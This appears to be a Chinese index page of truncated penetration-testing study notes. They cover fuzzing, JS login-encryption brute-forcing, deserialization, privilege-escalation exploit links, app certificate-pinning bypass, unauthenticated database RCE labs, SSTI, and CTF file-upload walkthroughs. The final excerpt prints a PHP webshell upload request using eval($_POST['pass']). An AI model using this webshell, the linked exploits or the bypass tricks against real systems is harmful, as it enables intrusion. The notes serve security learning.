Fuzz含义
是一种基于黑盒的自动化软件模糊测试技术,简单的说一种懒惰且暴力的技术融合了常见的以及精心构建的数据文本进行网站、软件安全性测试。
Fuzz 的核心思想
口令 Fuzz (弱口令)
目录 Fuzz (漏洞点)
参数 Fuzz (利用参数)
PayloadFuzz(Bypass)
Fuzz 应用场景:
爆破用户口令
爆破敏感目录
爆破文件地址
爆破未知参数名
Payload 测漏洞(绕过等也可以用
在实战黑盒中,目标有很多没有显示或其他工具扫描不到的文件或目录等,我们就可以通过大量的字典 Fuzz 找到的隐藏的文件进行测试。
BP工具jsEncrypterGitHub 下载地址:https://github.com/c0ny1/jsEncrypter
使用方式:
修改插件目录下的 phantomjs_server.js
修改加载实现加密算法的 js 脚本,需要将网站加密使用的 js 文件直接下载保存下来
修改处理函数
运行脚本,开启端口
1phantomjs .\phantomjs_server.js
配置插件,连接测试
然后在爆破模式下选择模块时选 ...
PHP反序列化序列化与反序列化序列化:对象转换为数组或字符串等格式
反序列化:将数组或字符串等格式转换成对象
serialize () // 将对象转换成一个字符串
unserialize () // 将字符串还原成一个对象
PHP对象转换为字符串格式
魔术方法
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915 ...
JS应用
作用域(本地&全局)运行后相关的数据值
调用堆栈(由下到上)是代码的执行逻辑顺序
常见分析调试
代码全局搜索
文件流程断点
代码标签断点
XHR提交
用途
针对JS开发应用
密码登录枚举爆破
参数提交漏洞检测
泄漏URL有更多测试
JS逆向登录算法流程&全局搜索
流程断点:审查元素抓网络请求包发起程序
全局搜索:通过抓包参数名进行代码全局搜索
标签&XHR断点
标签断点:审查元素对应标签按钮加入断点
XHR断点:审查元素源代码加入XHR断点配置
BurpSuite插件应用
下载phantomjs并设置环境变量 https://phantomjs.org/download.html
BurpSuite加载jsEncrypter插件 https://github.com/c0ny1/jsEncrypter/releases
对逆向的加密算法提取JS文件及代码
将代码写入到模版中(引用JS和调用加密-phantomjs_server.js)
1234567891011121314151617181920var wasSucc ...
系统安全操作系统漏扫本地漏扫Windows: https://i.hacking8.com/tiquan https://github.com/bitsadmin/wesng
Linux: https://github.com/mzet-/linux-exploit-suggester
POC&CVE: https://github.com/1nnocent1/PoC-in-GitHub
Win10-漏洞提权-CVE-2021-1732 https://github.com/KaLendsi/CVE-2021-1732-Exploit
Win08-漏洞提权-CVE-2019-1458 https://github.com/rip1s/CVE-2019-1458
Linux-漏洞提权-CVE-XXXX-XXXX https://github.com/mzet-/linux-exploit-suggester
远程漏扫NessusNessus号称是世界上最流行的漏洞扫描程序,全世界有超过75000个组织在使用它。该 工具提供完整的电脑漏洞扫描 ...
API简介API(Application Programming Interface,应用程序编程接口)是一些预先定义的函数,目的是提供应用程序与开发人员基于某软件或硬件得以访问一组例程的能力,而又无需访问源码,或理解内部工作机制的细节
API接口类型RESTful API:REST,Representational State Transfer的缩写,是一种使Web基础架构具有分布式特征的架构风格。RESTful API是基于REST架构风格的API,通常使用HTTP/js/ajax进行数据传输。它是使用最广泛的API类型之一。
特征: url加?WSDL 或后缀为.asmx
SOAP API:全称是Simple Object Access Protocol,是UDDI、XML和SOAP的组合,它要求在高度可靠和安全的系统之间进行通信。SOAP API 使用 XML 格式请求和响应数据,并支持多种协议,包括 HTTP、HTTPS 等。对于企业级应用程序来说,SOAP API更适合处理大规模数据交换和复杂的业务流程。
特征:Swagger
GraphQL A ...
Notes
未读APP攻防抓包简介抓包(packet capture)就是将网络传输发送与接收的数据包进行截获、重发、编辑、转存等操作,也用来检查网络安全。抓包也经常被用来进行数据截取等。
反证书检验绕过
反证书检验:SSL 证书绑定(单向校验和双向校验)
单项校验 - 客户端校验服务端的证书。
双向认证 - 客户端不仅仅要校验服务端的证书,也会在 app 内放一张证书;服务端也会检验客户端里的证书。
绕过手段
单向 - XP 框架
双向 - 看下课补充
逆向删反代码重打包
Xposed(Hook) 框架安装
教程:Android逆向学习(八)Xposed快速上手(上) - 吾爱破解 - 52pojie.cn
反代理 VPN 绕过防护手段
反代理 VPN:代理检测、VPN 检测、发包框架强制不走代理
配置代理后无法访问,数据异常等
连接 VPN 节点后无法访问,数据异常等
配置代理后正常访问且无任何异常,但无数据包
绕过手段反代理 VPN:
检测是否在 wifi 处设置了代理
用 APP 工具设置 - Postern
原理:
借助其他 app 文件设置代理,不用网络连接上设置代理,a ...
数据库安全知识点
数据库 - Redis - 未授权 RCE&CVE
数据库 - Couchdb - 未授权 RCE&CVE
数据库 - H2database - 未授权 RCE&CVE
环境
Vulfocus (官方在线的无法使用)
官方手册:https://fofapro.github.io/vulfocus/#/
搭建:
拉取镜像
1docker pull vulfocus/vulfocus:latest
创建容器
1docker run -d --restart=always -p port:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=ip vulfocus/vulfocus
port处填写任意访问端口,注意不要和其他容器端口冲突
ip处填写自己主机的ip地址
默认账户密码为 admin/admin
服务判断
端口扫描:利用服务开启后目标端口开放判断
组合判断:利用搭建常见组合分析可能开放服务
信息来源:访问端口提示软件版本,应用信息等
强弱特 ...
Python安全Python-PYC简介pyc 文件是py 文件编译后生成的字节码文件(byte code),pyc 文件经过python 解释器最 终会生成机器码运行。因此pyc文件是可以跨平台部署的,类似Java的.class文件,一般 py 文件改变后,都会重新生成pyc文件。
Python-反序列化序列化:把类对象转化为字节流或文件
反序列化:将字节流或文件转化为类对象
各类语言序列化和反序列化函数:Java: Serializable Externalizable 接口、fastjson、jackson、gson、 ObjectInputStream.read、ObjectObjectInputStream.readUnshared、XMLDecoder.read、 ObjectYaml.loadXStream.fromXML、ObjectMapper.readValue、JSON.parseObject 等
PHP: serialize()、 unserialize()
Python:pickle marshal json PyYAML shelve PIL ...
SSTI什么是 SSTI
SSTI(Server Side Template Injection,服务器端模板注入)服务端接收攻击者的输入,将其作为 Web 应用模板内容的一部分
在进行目标编译渲染的过程中,进行了语句的拼接,执行了所插入的恶意内容
从而导致信息泄露、代码执行、GetShell 等问题,其影响范围取决于模版引擎复杂性
各语言框架 SSTI
PHP:smarty、twig
Python:jinja2、mako、tornad、Django
java:Thymeleaf、jade、velocity、FreeMarker
Engine
Language
Burp
ZAP
tplmap
site done
known exploit
port
tags
jinja2
Python
√
√
√
√
√
5000
Mako
Python
√
√
√
√
√
5001
$
文件上传Web151简单的前台校验
1234567891011POST /upload.php HTTP/1.1------WebKitFormBoundaryvMSd1VAMNAg5fJbTContent-Disposition: form-data; name="file"; filename="1.png"Content-Type: image/png<?phpeval($_POST["pass"]);------WebKitFormBoundaryvMSd1VAMNAg5fJbT--
上传1.png文件后门文件然后改后缀为php
Web152类似151题
Web153传.png抓包改.php
显示文件上传失败,失败原因:文件类型不合规
猜测过滤了php
尝试大小写绕过过滤,可以上传但是无法连接
url上输入 /upload/
显示了nothing here表示可以用配置文件(因为upload目录下有php文件)
php.ini是php的一个全局配置文件,对整个web服务起作用;而.use ...